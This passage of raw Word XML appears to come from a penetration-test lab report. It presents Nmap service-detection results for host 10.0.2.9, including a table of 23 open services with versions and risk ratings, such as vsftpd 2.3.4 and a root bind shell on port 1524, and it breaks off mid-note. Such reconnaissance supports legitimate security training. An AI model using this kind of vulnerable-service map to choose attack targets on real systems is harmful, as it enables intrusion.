        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Nmap scan output screenshot is shown below. The scan confirmed the host at 10.0.2.9 as active and reachable, and enumerated all exposed TCP services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="4800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4800600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1: Nmap 7.95 Service and Version Detection Scan Output for Target 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4  Port and Service Enumeration Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Nmap -sV scan identified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">23 open TCP services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target host. The complete service inventory is presented in Table 8 below. Services are ordered by port number for clarity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 8: Complete Service Inventory — Target 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="800"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Detected Version / Banner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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vsftpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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OpenSSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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OpenSSH 3.5p1 (protocol 2.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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23/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Linux telnet service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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53/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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ISC BIND</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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ISC BIND 9.3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Apache httpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Apache 2.2.8 (Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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111/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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rpcbind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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rpcbind / portmapper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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139/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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NetBIOS-SSN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Samba smbd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Samba 3.x – 4.x (SMB/NetBIOS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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445/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Microsoft-DS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Samba smbd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Samba 3.0.20-Debian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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512/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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rexec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Remote execution service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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513/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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rlogin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Remote login service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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514/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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rsh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Remote shell service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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1099/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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RMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Java RMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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GNU Classpath grmiregistry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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1524/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Metasploitable Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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ingreslock / root bind shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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2049/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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NFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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NFS / nlockmgr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Network File System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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2121/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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ProFTPD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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ProFTPD 1.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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3306/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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MySQL 5.0.51a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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5432/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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PostgreSQL DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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PostgreSQL 8.3.0 – 8.3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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5900/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Protocol 3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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6000/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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X11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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X Window System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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X11 (access denied)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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6667/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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UnrealIRCd 3.2.8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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8009/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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AJP13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Apache Jserv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Apache JServ Protocol v1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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8180/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Apache Tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Apache Tomcat/Coyote JSP 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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8787/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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DRb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Ruby DRb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Ruby Distributed Object Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2326"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
